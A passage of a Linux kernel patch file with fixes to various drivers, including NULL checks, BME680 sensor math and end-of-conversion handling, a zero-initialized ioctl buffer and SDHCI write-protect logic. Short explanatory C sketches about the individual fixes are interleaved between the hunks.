+@@ -367,12 +374,19 @@ static void amdgpu_vkms_cleanup_fb(struct drm_plane *plane,
+ 				   struct drm_plane_state *old_state)
+ {
+ 	struct amdgpu_bo *rbo;
++	struct drm_gem_object *obj;
+ 	int r;
+ 
+ 	if (!old_state->fb)
+ 		return;
+ 
+-	rbo = gem_to_amdgpu_bo(old_state->fb->obj[0]);
++	obj = drm_gem_fb_get_obj(old_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return;
++	}
++
++	rbo = gem_to_amdgpu_bo(obj);
+ 	r = amdgpu_bo_reserve(rbo, false);
+ 	if (unlikely(r)) {
+ 		DRM_ERROR("failed to reserve rbo before unpin\n");
+diff --git a/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c b/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
+index ea775e601686d..a9dbca9d9c0ce 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
++++ b/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
+@@ -296,6 +296,7 @@ void i915_vma_revoke_fence(struct i915_vma *vma)
+ 		return;
+ 
+ 	GEM_BUG_ON(fence->vma != vma);
++	i915_active_wait(&fence->active);
+ 	GEM_BUG_ON(!i915_active_is_idle(&fence->active));
+ 	GEM_BUG_ON(atomic_read(&fence->pin_count));
+ 
+diff --git a/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c b/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
+index be28e7bd74903..1da9d1e89f91b 100644
+--- a/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
++++ b/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
+@@ -208,6 +208,8 @@ static int nv17_tv_get_ld_modes(struct drm_encoder *encoder,
+ 		struct drm_display_mode *mode;
+ 
+ 		mode = drm_mode_duplicate(encoder->dev, tv_mode);
++		if (!mode)
++			continue;
+ 
+ 		mode->clock = tv_norm->tv_enc_mode.vrefresh *
+ 			mode->htotal / 1000 *
+@@ -257,6 +259,8 @@ static int nv17_tv_get_hd_modes(struct drm_encoder *encoder,
+ 		if (modes[i].hdisplay == output_mode->hdisplay &&
+ 		    modes[i].vdisplay == output_mode->vdisplay) {
+ 			mode = drm_mode_duplicate(encoder->dev, output_mode);
++			if (!mode)
++				continue;
+ 			mode->type |= DRM_MODE_TYPE_PREFERRED;
+ 
+ 		} else {
+@@ -264,6 +268,8 @@ static int nv17_tv_get_hd_modes(struct drm_encoder *encoder,
+ 					    modes[i].vdisplay, 60, false,
+ 					    (output_mode->flags &
+ 					     DRM_MODE_FLAG_INTERLACE), false);
++			if (!mode)
++				continue;
+ 		}
+ 
+ 		/* CVT modes are sometimes unsuitable... */
+diff --git a/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c b/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
+index cbb68caa36f26..4014c537e397d 100644
+--- a/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
++++ b/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
+@@ -716,10 +716,10 @@ static int ili9881c_prepare(struct drm_panel *panel)
+ 	msleep(5);
+ 
+ 	/* And reset it */
+-	gpiod_set_value(ctx->reset, 1);
++	gpiod_set_value_cansleep(ctx->reset, 1);
+ 	msleep(20);
+ 
+-	gpiod_set_value(ctx->reset, 0);
++	gpiod_set_value_cansleep(ctx->reset, 0);
+ 	msleep(20);
+ 
+ 	for (i = 0; i < ctx->desc->init_length; i++) {
+@@ -774,7 +774,7 @@ static int ili9881c_unprepare(struct drm_panel *panel)
+ 
+ 	mipi_dsi_dcs_enter_sleep_mode(ctx->dsi);
+ 	regulator_disable(ctx->power);
+-	gpiod_set_value(ctx->reset, 1);
++	gpiod_set_value_cansleep(ctx->reset, 1);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index acb7f5c206d13..b560d62b6e219 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2371,6 +2371,7 @@ static const struct display_timing koe_tx26d202vm0bwa_timing = {
+ 	.vfront_porch = { 3, 5, 10 },
+ 	.vback_porch = { 2, 5, 10 },
+ 	.vsync_len = { 5, 5, 5 },
++	.flags = DISPLAY_FLAGS_DE_HIGH,
+ };
+ 
+ static const struct panel_desc koe_tx26d202vm0bwa = {
+diff --git a/drivers/gpu/drm/radeon/radeon.h b/drivers/gpu/drm/radeon/radeon.h
+index 166c18d62f6d7..ec86c04a0d989 100644
+--- a/drivers/gpu/drm/radeon/radeon.h
++++ b/drivers/gpu/drm/radeon/radeon.h
+@@ -131,7 +131,6 @@ extern int radeon_cik_support;
+ /* RADEON_IB_POOL_SIZE must be a power of 2 */
+ #define RADEON_IB_POOL_SIZE			16
+ #define RADEON_DEBUGFS_MAX_COMPONENTS		32
+-#define RADEONFB_CONN_LIMIT			4
+ #define RADEON_BIOS_NUM_SCRATCH			8
+ 
+ /* internal ring indices */
+diff --git a/drivers/gpu/drm/radeon/radeon_display.c b/drivers/gpu/drm/radeon/radeon_display.c
+index 1814bb8e14f10..dbee301b3b2e8 100644
+--- a/drivers/gpu/drm/radeon/radeon_display.c
++++ b/drivers/gpu/drm/radeon/radeon_display.c
+@@ -683,7 +683,7 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	struct radeon_device *rdev = dev->dev_private;
+ 	struct radeon_crtc *radeon_crtc;
+ 
+-	radeon_crtc = kzalloc(sizeof(struct radeon_crtc) + (RADEONFB_CONN_LIMIT * sizeof(struct drm_connector *)), GFP_KERNEL);
++	radeon_crtc = kzalloc(sizeof(*radeon_crtc), GFP_KERNEL);
+ 	if (radeon_crtc == NULL)
+ 		return;
+ 
+@@ -709,12 +709,6 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	dev->mode_config.cursor_width = radeon_crtc->max_cursor_width;
+ 	dev->mode_config.cursor_height = radeon_crtc->max_cursor_height;
+ 
+-#if 0
+-	radeon_crtc->mode_set.crtc = &radeon_crtc->base;
+-	radeon_crtc->mode_set.connectors = (struct drm_connector **)(radeon_crtc + 1);
+-	radeon_crtc->mode_set.num_connectors = 0;
+-#endif
+-
+ 	if (rdev->is_atom_bios && (ASIC_IS_AVIVO(rdev) || radeon_r4xx_atom))
+ 		radeon_atombios_init_crtc(dev, radeon_crtc);
+ 	else
+diff --git a/drivers/i2c/i2c-slave-testunit.c b/drivers/i2c/i2c-slave-testunit.c
+index 75ee7ebdb614f..54c08f48a8b85 100644
+--- a/drivers/i2c/i2c-slave-testunit.c
++++ b/drivers/i2c/i2c-slave-testunit.c
+@@ -118,9 +118,12 @@ static int i2c_slave_testunit_slave_cb(struct i2c_client *client,
+ 			queue_delayed_work(system_long_wq, &tu->worker,
+ 					   msecs_to_jiffies(10 * tu->regs[TU_REG_DELAY]));
+ 		}
+-		fallthrough;
++		break;
+ 
+ 	case I2C_SLAVE_WRITE_REQUESTED:
++		if (test_bit(TU_FLAG_IN_PROCESS, &tu->flags))
++			return -EBUSY;
++
+ 		memset(tu->regs, 0, TU_NUM_REGS);
+ 		tu->reg_idx = 0;
+ 		break;
+diff --git a/drivers/iio/accel/Kconfig b/drivers/iio/accel/Kconfig
+index 1f34747a68bfe..7b55a44815455 100644
+--- a/drivers/iio/accel/Kconfig
++++ b/drivers/iio/accel/Kconfig
+@@ -325,6 +325,8 @@ config DMARD10
+ config FXLS8962AF
+ 	tristate
+ 	depends on I2C || !I2C # cannot be built-in for modular I2C
++	select IIO_BUFFER
++	select IIO_KFIFO_BUF
+ 
+ config FXLS8962AF_I2C
+ 	tristate "NXP FXLS8962AF/FXLS8964AF Accelerometer I2C Driver"
+diff --git a/drivers/iio/adc/ad7266.c b/drivers/iio/adc/ad7266.c
+index 468c2656d2be7..98648c679a55c 100644
+--- a/drivers/iio/adc/ad7266.c
++++ b/drivers/iio/adc/ad7266.c
+@@ -157,6 +157,8 @@ static int ad7266_read_raw(struct iio_dev *indio_dev,
+ 		ret = ad7266_read_single(st, val, chan->address);
+ 		iio_device_release_direct_mode(indio_dev);
+ 
++		if (ret < 0)
++			return ret;
+ 		*val = (*val >> 2) & 0xfff;
+ 		if (chan->scan_type.sign == 's')
+ 			*val = sign_extend32(*val,
+diff --git a/drivers/iio/adc/xilinx-ams.c b/drivers/iio/adc/xilinx-ams.c
+index a507d2e170792..3db021b96ae9d 100644
+--- a/drivers/iio/adc/xilinx-ams.c
++++ b/drivers/iio/adc/xilinx-ams.c
+@@ -414,8 +414,12 @@ static void ams_enable_channel_sequence(struct iio_dev *indio_dev)
+ 
+ 	/* Run calibration of PS & PL as part of the sequence */
+ 	scan_mask = BIT(0) | BIT(AMS_PS_SEQ_MAX);
+-	for (i = 0; i < indio_dev->num_channels; i++)
+-		scan_mask |= BIT_ULL(indio_dev->channels[i].scan_index);
++	for (i = 0; i < indio_dev->num_channels; i++) {
++		const struct iio_chan_spec *chan = &indio_dev->channels[i];
++
++		if (chan->scan_index < AMS_CTRL_SEQ_BASE)
++			scan_mask |= BIT_ULL(chan->scan_index);
++	}
+ 
+ 	if (ams->ps_base) {
+ 		/* put sysmon in a soft reset to change the sequence */
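
Beyond the driver detail, the xilinx-ams fix above illustrates a general rule: shifting a 64-bit mask by an index of 64 or more is undefined behaviour in C, so scan indices that fall outside the sequencer range must be skipped, not shifted. A standalone sketch with an illustrative cutoff standing in for AMS_CTRL_SEQ_BASE (not the driver's actual value):

#include <stdint.h>
#include <stdio.h>

#define SEQ_LIMIT	64	/* illustrative stand-in for AMS_CTRL_SEQ_BASE */

static uint64_t build_scan_mask(const int *scan_index, int n)
{
	uint64_t mask = 0;
	int i;

	for (i = 0; i < n; i++) {
		/*
		 * 1ULL << 64 (or more) is undefined behaviour, so
		 * out-of-range indices are skipped instead of shifted.
		 */
		if (scan_index[i] < SEQ_LIMIT)
			mask |= 1ULL << scan_index[i];
	}
	return mask;
}

int main(void)
{
	int idx[] = { 0, 7, 22, 70 };	/* 70 would be UB without the check */

	printf("0x%llx\n", (unsigned long long)build_scan_mask(idx, 4));
	return 0;
}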
+diff --git a/drivers/iio/chemical/bme680.h b/drivers/iio/chemical/bme680.h
+index 4edc5d21cb9fa..f959252a4fe66 100644
+--- a/drivers/iio/chemical/bme680.h
++++ b/drivers/iio/chemical/bme680.h
+@@ -54,7 +54,9 @@
+ #define   BME680_NB_CONV_MASK			GENMASK(3, 0)
+ 
+ #define BME680_REG_MEAS_STAT_0			0x1D
++#define   BME680_NEW_DATA_BIT			BIT(7)
+ #define   BME680_GAS_MEAS_BIT			BIT(6)
++#define   BME680_MEAS_BIT			BIT(5)
+ 
+ /* Calibration Parameters */
+ #define BME680_T2_LSB_REG	0x8A
+diff --git a/drivers/iio/chemical/bme680_core.c b/drivers/iio/chemical/bme680_core.c
+index ef5e0e46fd344..500f56834b01f 100644
+--- a/drivers/iio/chemical/bme680_core.c
++++ b/drivers/iio/chemical/bme680_core.c
+@@ -10,6 +10,7 @@
+  */
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/log2.h>
+@@ -38,7 +39,7 @@ struct bme680_calib {
+ 	s8  par_h3;
+ 	s8  par_h4;
+ 	s8  par_h5;
+-	s8  par_h6;
++	u8  par_h6;
+ 	s8  par_h7;
+ 	s8  par_gh1;
+ 	s16 par_gh2;
+@@ -342,10 +343,10 @@ static s16 bme680_compensate_temp(struct bme680_data *data,
+ 	if (!calib->par_t2)
+ 		bme680_read_calib(data, calib);
+ 
+-	var1 = (adc_temp >> 3) - (calib->par_t1 << 1);
++	var1 = (adc_temp >> 3) - ((s32)calib->par_t1 << 1);
+ 	var2 = (var1 * calib->par_t2) >> 11;
+ 	var3 = ((var1 >> 1) * (var1 >> 1)) >> 12;
+-	var3 = (var3 * (calib->par_t3 << 4)) >> 14;
++	var3 = (var3 * ((s32)calib->par_t3 << 4)) >> 14;
+ 	data->t_fine = var2 + var3;
+ 	calc_temp = (data->t_fine * 5 + 128) >> 8;
+ 
+@@ -368,9 +369,9 @@ static u32 bme680_compensate_press(struct bme680_data *data,
+ 	var1 = (data->t_fine >> 1) - 64000;
+ 	var2 = ((((var1 >> 2) * (var1 >> 2)) >> 11) * calib->par_p6) >> 2;
+ 	var2 = var2 + (var1 * calib->par_p5 << 1);
+-	var2 = (var2 >> 2) + (calib->par_p4 << 16);
++	var2 = (var2 >> 2) + ((s32)calib->par_p4 << 16);
+ 	var1 = (((((var1 >> 2) * (var1 >> 2)) >> 13) *
+-			(calib->par_p3 << 5)) >> 3) +
++			((s32)calib->par_p3 << 5)) >> 3) +
+ 			((calib->par_p2 * var1) >> 1);
+ 	var1 = var1 >> 18;
+ 	var1 = ((32768 + var1) * calib->par_p1) >> 15;
+@@ -388,7 +389,7 @@ static u32 bme680_compensate_press(struct bme680_data *data,
+ 	var3 = ((press_comp >> 8) * (press_comp >> 8) *
+ 			(press_comp >> 8) * calib->par_p10) >> 17;
+ 
+-	press_comp += (var1 + var2 + var3 + (calib->par_p7 << 7)) >> 4;
++	press_comp += (var1 + var2 + var3 + ((s32)calib->par_p7 << 7)) >> 4;
+ 
+ 	return press_comp;
+ }
+@@ -414,7 +415,7 @@ static u32 bme680_compensate_humid(struct bme680_data *data,
+ 		 (((temp_scaled * ((temp_scaled * calib->par_h5) / 100))
+ 		   >> 6) / 100) + (1 << 14))) >> 10;
+ 	var3 = var1 * var2;
+-	var4 = calib->par_h6 << 7;
++	var4 = (s32)calib->par_h6 << 7;
+ 	var4 = (var4 + ((temp_scaled * calib->par_h7) / 100)) >> 4;
+ 	var5 = ((var3 >> 14) * (var3 >> 14)) >> 10;
+ 	var6 = (var4 * var5) >> 1;
+@@ -532,6 +533,43 @@ static u8 bme680_oversampling_to_reg(u8 val)
+ 	return ilog2(val) + 1;
+ }
+ 
++/*
++ * Taken from Bosch BME680 API:
++ * https://github.com/boschsensortec/BME68x_SensorAPI/blob/v4.4.8/bme68x.c#L490
++ */
++static int bme680_wait_for_eoc(struct bme680_data *data)
++{
++	struct device *dev = regmap_get_device(data->regmap);
++	unsigned int check;
++	int ret;
++	/*
++	 * (Sum of oversampling ratios * time per oversampling) +
++	 * TPH measurement + gas measurement + wait transition from forced mode
++	 * + heater duration
++	 */
++	int wait_eoc_us = ((data->oversampling_temp + data->oversampling_press +
++			   data->oversampling_humid) * 1936) + (477 * 4) +
++			   (477 * 5) + 1000 + (data->heater_dur * 1000);
++
++	usleep_range(wait_eoc_us, wait_eoc_us + 100);
++
++	ret = regmap_read(data->regmap, BME680_REG_MEAS_STAT_0, &check);
++	if (ret) {
++		dev_err(dev, "failed to read measurement status register.\n");
++		return ret;
++	}
++	if (check & BME680_MEAS_BIT) {
++		dev_err(dev, "Device measurement cycle incomplete.\n");
++		return -EBUSY;
++	}
++	if (!(check & BME680_NEW_DATA_BIT)) {
++		dev_err(dev, "No new data available from the device.\n");
++		return -ENODATA;
++	}
++
++	return 0;
++}
++
+ static int bme680_chip_config(struct bme680_data *data)
+ {
+ 	struct device *dev = regmap_get_device(data->regmap);
+@@ -622,6 +660,10 @@ static int bme680_read_temp(struct bme680_data *data, int *val)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	ret = bme680_wait_for_eoc(data);
++	if (ret)
++		return ret;
++
+ 	ret = regmap_bulk_read(data->regmap, BME680_REG_TEMP_MSB,
+ 			       &tmp, 3);
+ 	if (ret < 0) {
+@@ -678,7 +720,7 @@ static int bme680_read_press(struct bme680_data *data,
+ 	}
+ 
+ 	*val = bme680_compensate_press(data, adc_press);
+-	*val2 = 100;
++	*val2 = 1000;
+ 	return IIO_VAL_FRACTIONAL;
+ }
+ 
+@@ -738,6 +780,10 @@ static int bme680_read_gas(struct bme680_data *data,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	ret = bme680_wait_for_eoc(data);
++	if (ret)
++		return ret;
++
+ 	ret = regmap_read(data->regmap, BME680_REG_MEAS_STAT_0, &check);
+ 	if (check & BME680_GAS_MEAS_BIT) {
+ 		dev_err(dev, "gas measurement incomplete\n");
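
The new bme680_wait_for_eoc() above sleeps for a worst-case conversion time before polling the status register, and the formula comes straight from the hunk (and the referenced Bosch API): oversampled T/P/H sampling, plus TPH and gas measurement, plus forced-mode transition slack, plus the heater pulse. A standalone sketch of just that arithmetic (constants from the hunk, example values invented):

#include <stdio.h>

/*
 * Worst-case end-of-conversion wait in microseconds, per the formula
 * in bme680_wait_for_eoc(): (sum of oversampling ratios * time per
 * oversampling) + TPH measurement + gas measurement + forced-mode
 * transition + heater duration.
 */
static int wait_eoc_us(int os_temp, int os_press, int os_humid,
		       int heater_dur_ms)
{
	return ((os_temp + os_press + os_humid) * 1936) +
	       (477 * 4) + (477 * 5) + 1000 +
	       (heater_dur_ms * 1000);
}

int main(void)
{
	/* 2x/4x/1x oversampling with a 150 ms heater pulse */
	printf("%d us\n", wait_eoc_us(2, 4, 1, 150));
	return 0;
}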
+diff --git a/drivers/infiniband/core/restrack.c b/drivers/infiniband/core/restrack.c
+index 01a499a8b88db..438ed35881752 100644
+--- a/drivers/infiniband/core/restrack.c
++++ b/drivers/infiniband/core/restrack.c
+@@ -37,22 +37,6 @@ int rdma_restrack_init(struct ib_device *dev)
+ 	return 0;
+ }
+ 
+-static const char *type2str(enum rdma_restrack_type type)
+-{
+-	static const char * const names[RDMA_RESTRACK_MAX] = {
+-		[RDMA_RESTRACK_PD] = "PD",
+-		[RDMA_RESTRACK_CQ] = "CQ",
+-		[RDMA_RESTRACK_QP] = "QP",
+-		[RDMA_RESTRACK_CM_ID] = "CM_ID",
+-		[RDMA_RESTRACK_MR] = "MR",
+-		[RDMA_RESTRACK_CTX] = "CTX",
+-		[RDMA_RESTRACK_COUNTER] = "COUNTER",
+-		[RDMA_RESTRACK_SRQ] = "SRQ",
+-	};
+-
+-	return names[type];
+-};
+-
+ /**
+  * rdma_restrack_clean() - clean resource tracking
+  * @dev:  IB device
+@@ -60,47 +44,14 @@ static const char *type2str(enum rdma_restrack_type type)
+ void rdma_restrack_clean(struct ib_device *dev)
+ {
+ 	struct rdma_restrack_root *rt = dev->res;
+-	struct rdma_restrack_entry *e;
+-	char buf[TASK_COMM_LEN];
+-	bool found = false;
+-	const char *owner;
+ 	int i;
+ 
+ 	for (i = 0 ; i < RDMA_RESTRACK_MAX; i++) {
+ 		struct xarray *xa = &dev->res[i].xa;
+ 
+-		if (!xa_empty(xa)) {
+-			unsigned long index;
+-
+-			if (!found) {
+-				pr_err("restrack: %s", CUT_HERE);
+-				dev_err(&dev->dev, "BUG: RESTRACK detected leak of resources\n");
+-			}
+-			xa_for_each(xa, index, e) {
+-				if (rdma_is_kernel_res(e)) {
+-					owner = e->kern_name;
+-				} else {
+-					/*
+-					 * There is no need to call get_task_struct here,
+-					 * because we can be here only if there are more
+-					 * get_task_struct() call than put_task_struct().
+-					 */
+-					get_task_comm(buf, e->task);
+-					owner = buf;
+-				}
+-
+-				pr_err("restrack: %s %s object allocated by %s is not freed\n",
+-				       rdma_is_kernel_res(e) ? "Kernel" :
+-							       "User",
+-				       type2str(e->type), owner);
+-			}
+-			found = true;
+-		}
++		WARN_ON(!xa_empty(xa));
+ 		xa_destroy(xa);
+ 	}
+-	if (found)
+-		pr_err("restrack: %s", CUT_HERE);
+-
+ 	kfree(rt);
+ }
+ 
+diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
+index e9bd36adbe47d..e3a36cd3656c0 100644
+--- a/drivers/input/touchscreen/ili210x.c
++++ b/drivers/input/touchscreen/ili210x.c
+@@ -261,8 +261,8 @@ static int ili251x_read_touch_data(struct i2c_client *client, u8 *data)
+ 	if (!error && data[0] == 2) {
+ 		error = i2c_master_recv(client, data + ILI251X_DATA_SIZE1,
+ 					ILI251X_DATA_SIZE2);
+-		if (error >= 0 && error != ILI251X_DATA_SIZE2)
+-			error = -EIO;
++		if (error >= 0)
++			error = error == ILI251X_DATA_SIZE2 ? 0 : -EIO;
+ 	}
+ 
+ 	return error;
+diff --git a/drivers/irqchip/irq-loongson-liointc.c b/drivers/irqchip/irq-loongson-liointc.c
+index c4584e2f0ad3d..37b05567fb0ed 100644
+--- a/drivers/irqchip/irq-loongson-liointc.c
++++ b/drivers/irqchip/irq-loongson-liointc.c
+@@ -28,7 +28,7 @@
+ 
+ #define LIOINTC_INTC_CHIP_START	0x20
+ 
+-#define LIOINTC_REG_INTC_STATUS	(LIOINTC_INTC_CHIP_START + 0x20)
++#define LIOINTC_REG_INTC_STATUS(core)	(LIOINTC_INTC_CHIP_START + 0x20 + (core) * 8)
+ #define LIOINTC_REG_INTC_EN_STATUS	(LIOINTC_INTC_CHIP_START + 0x04)
+ #define LIOINTC_REG_INTC_ENABLE	(LIOINTC_INTC_CHIP_START + 0x08)
+ #define LIOINTC_REG_INTC_DISABLE	(LIOINTC_INTC_CHIP_START + 0x0c)
+@@ -196,7 +196,7 @@ static int liointc_init(phys_addr_t addr, unsigned long size, int revision,
+ 		goto out_free_priv;
+ 
+ 	for (i = 0; i < LIOINTC_NUM_CORES; i++)
+-		priv->core_isr[i] = base + LIOINTC_REG_INTC_STATUS;
++		priv->core_isr[i] = base + LIOINTC_REG_INTC_STATUS(i);
+ 
+ 	for (i = 0; i < LIOINTC_NUM_PARENT; i++)
+ 		priv->handler[i].parent_int_map = parent_int_map[i];
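
The liointc fix above turns one shared status register into a per-core array: core N's ISR sits N * 8 bytes past the core-0 register at chip offset 0x20 + 0x20. The macro is plain address arithmetic; a compile-and-run sketch that just prints the offsets it produces:

#include <stdio.h>

#define LIOINTC_INTC_CHIP_START		0x20
/* Per-core interrupt status: cores are spaced 8 bytes apart. */
#define LIOINTC_REG_INTC_STATUS(core)	\
	(LIOINTC_INTC_CHIP_START + 0x20 + (core) * 8)

int main(void)
{
	int core;

	/* four cores assumed here, standing in for LIOINTC_NUM_CORES */
	for (core = 0; core < 4; core++)
		printf("core %d ISR at +0x%x\n",
		       core, LIOINTC_REG_INTC_STATUS(core));
	return 0;
}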
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index aefee2277254d..04b7ce479fc38 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -964,7 +964,7 @@ int dvb_usercopy(struct file *file,
+ 		     int (*func)(struct file *file,
+ 		     unsigned int cmd, void *arg))
+ {
+-	char    sbuf[128];
++	char    sbuf[128] = {};
+ 	void    *mbuf = NULL;
+ 	void    *parg = NULL;
+ 	int     err  = -EINVAL;
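
The dvbdev one-liner above (sbuf zero-initialized) closes a stack infoleak: when an ioctl handler fills only part of the argument buffer, the untouched tail would otherwise be copied back to userspace as stale stack bytes. A minimal demonstration of what the initializer guarantees (the partial handler is invented):

#include <stdio.h>
#include <string.h>

static void handler_fills_prefix_only(char *arg)
{
	/* pretend the ioctl handler only writes the first few bytes */
	memcpy(arg, "ok", 3);
}

int main(void)
{
	char sbuf[128] = {};	/* zero-init: no stale stack contents */

	handler_fills_prefix_only(sbuf);
	/* every byte past the written prefix is guaranteed to be 0 */
	printf("byte 100 = %d\n", sbuf[100]);
	return 0;
}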
+diff --git a/drivers/mmc/host/sdhci-brcmstb.c b/drivers/mmc/host/sdhci-brcmstb.c
+index 55d8bd232695c..5b650d5dd0ae6 100644
+--- a/drivers/mmc/host/sdhci-brcmstb.c
++++ b/drivers/mmc/host/sdhci-brcmstb.c
+@@ -23,6 +23,7 @@
+ #define BRCMSTB_MATCH_FLAGS_NO_64BIT		BIT(0)
+ #define BRCMSTB_MATCH_FLAGS_BROKEN_TIMEOUT	BIT(1)
+ #define BRCMSTB_MATCH_FLAGS_HAS_CLOCK_GATE	BIT(2)
++#define BRCMSTB_MATCH_FLAGS_USE_CARD_BUSY	BIT(4)
+ 
+ #define BRCMSTB_PRIV_FLAGS_HAS_CQE		BIT(0)
+ #define BRCMSTB_PRIV_FLAGS_GATE_CLOCK		BIT(1)
+@@ -335,6 +336,9 @@ static int sdhci_brcmstb_probe(struct platform_device *pdev)
+ 	if (match_priv->flags & BRCMSTB_MATCH_FLAGS_BROKEN_TIMEOUT)
+ 		host->quirks |= SDHCI_QUIRK_BROKEN_TIMEOUT_VAL;
+ 
++	if (!(match_priv->flags & BRCMSTB_MATCH_FLAGS_USE_CARD_BUSY))
++		host->mmc_host_ops.card_busy = NULL;
++
+ 	/* Change the base clock frequency if the DT property exists */
+ 	if (device_property_read_u32(&pdev->dev, "clock-frequency",
+ 				     &priv->base_freq_hz) != 0)
+diff --git a/drivers/mmc/host/sdhci-pci-core.c b/drivers/mmc/host/sdhci-pci-core.c
+index 28dc65023fa9f..bda9e10df2507 100644
+--- a/drivers/mmc/host/sdhci-pci-core.c
++++ b/drivers/mmc/host/sdhci-pci-core.c
+@@ -1330,7 +1330,7 @@ static int jmicron_pmos(struct sdhci_pci_chip *chip, int on)
+ 
+ 	ret = pci_read_config_byte(chip->pdev, 0xAE, &scratch);
+ 	if (ret)
+-		return ret;
++		goto fail;
+ 
+ 	/*
+ 	 * Turn PMOS on [bit 0], set over current detection to 2.4 V
+@@ -1341,7 +1341,10 @@ static int jmicron_pmos(struct sdhci_pci_chip *chip, int on)
+ 	else
+ 		scratch &= ~0x47;
+ 
+-	return pci_write_config_byte(chip->pdev, 0xAE, scratch);
++	ret = pci_write_config_byte(chip->pdev, 0xAE, scratch);
++
++fail:
++	return pcibios_err_to_errno(ret);
+ }
+ 
+ static int jmicron_probe(struct sdhci_pci_chip *chip)
+@@ -2201,7 +2204,7 @@ static int sdhci_pci_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_read_config_byte(pdev, PCI_SLOT_INFO, &slots);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 
+ 	slots = PCI_SLOT_INFO_SLOTS(slots) + 1;
+ 	dev_dbg(&pdev->dev, "found %d slot(s)\n", slots);
+@@ -2210,7 +2213,7 @@ static int sdhci_pci_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_read_config_byte(pdev, PCI_SLOT_INFO, &first_bar);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 
+ 	first_bar &= PCI_SLOT_INFO_FIRST_BAR_MASK;
+ 
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 111f7c6770605..4237d8ae878c1 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -2539,26 +2539,29 @@ EXPORT_SYMBOL_GPL(sdhci_get_cd_nogpio);
+ 
+ static int sdhci_check_ro(struct sdhci_host *host)
+ {
+-	unsigned long flags;
++	bool allow_invert = false;
+ 	int is_readonly;
+ 
+-	spin_lock_irqsave(&host->lock, flags);
+-
+-	if (host->flags & SDHCI_DEVICE_DEAD)
++	if (host->flags & SDHCI_DEVICE_DEAD) {
+ 		is_readonly = 0;
+-	else if (host->ops->get_ro)
++	} else if (host->ops->get_ro) {
+ 		is_readonly = host->ops->get_ro(host);
+-	else if (mmc_can_gpio_ro(host->mmc))
++	} else if (mmc_can_gpio_ro(host->mmc)) {
+ 		is_readonly = mmc_gpio_get_ro(host->mmc);
+-	else
++		/* Do not invert twice */
++		allow_invert = !(host->mmc->caps2 & MMC_CAP2_RO_ACTIVE_HIGH);
++	} else {
+ 		is_readonly = !(sdhci_readl(host, SDHCI_PRESENT_STATE)
+ 				& SDHCI_WRITE_PROTECT);
++		allow_invert = true;
++	}
+ 
+-	spin_unlock_irqrestore(&host->lock, flags);
++	if (is_readonly >= 0 &&
++	    allow_invert &&
++	    (host->quirks & SDHCI_QUIRK_INVERTED_WRITE_PROTECT))
++		is_readonly = !is_readonly;
+ 
+-	/* This quirk needs to be replaced by a callback-function later */
+-	return host->quirks & SDHCI_QUIRK_INVERTED_WRITE_PROTECT ?
+-		!is_readonly : is_readonly;
++	return is_readonly;
+ }
+ 
+ #define SAMPLE_COUNT	5
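
The sdhci_check_ro() rework above is about applying the inverted-write-protect quirk exactly once: a GPIO read-only line may already have had its polarity handled via MMC_CAP2_RO_ACTIVE_HIGH, so SDHCI_QUIRK_INVERTED_WRITE_PROTECT may only flip sources that have not applied it themselves. A reduced standalone sketch of that decision table (the enum and harness are invented; the per-source behaviour follows the hunk):

#include <stdbool.h>
#include <stdio.h>

/* Where the read-only state came from, reduced from sdhci_check_ro(). */
enum ro_source { RO_DEAD, RO_HOST_OP, RO_GPIO, RO_REGISTER };

static int check_ro(enum ro_source src, int raw, bool gpio_active_high,
		    bool inverted_quirk)
{
	bool allow_invert = false;
	int is_readonly = raw;

	switch (src) {
	case RO_DEAD:
		is_readonly = 0;	/* dead host: report writable */
		break;
	case RO_HOST_OP:
		break;			/* driver callback owns the polarity */
	case RO_GPIO:
		/* gpiolib already inverted if the active-high cap is set */
		allow_invert = !gpio_active_high;
		break;
	case RO_REGISTER:
		allow_invert = true;	/* raw WP bit, polarity unknown */
		break;
	}

	if (is_readonly >= 0 && allow_invert && inverted_quirk)
		is_readonly = !is_readonly;

	return is_readonly;
}

int main(void)
{
	/* GPIO that already handled polarity: the quirk must not flip it */
	printf("%d\n", check_ro(RO_GPIO, 1, true, true));	/* 1 */
	/* raw register bit plus the quirk: inverted exactly once */
	printf("%d\n", check_ro(RO_REGISTER, 1, false, true));	/* 0 */
	return 0;
}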
+diff --git a/drivers/mtd/parsers/redboot.c b/drivers/mtd/parsers/redboot.c
+index a16b42a885816..3b55b676ca6b9 100644
+--- a/drivers/mtd/parsers/redboot.c
++++ b/drivers/mtd/parsers/redboot.c
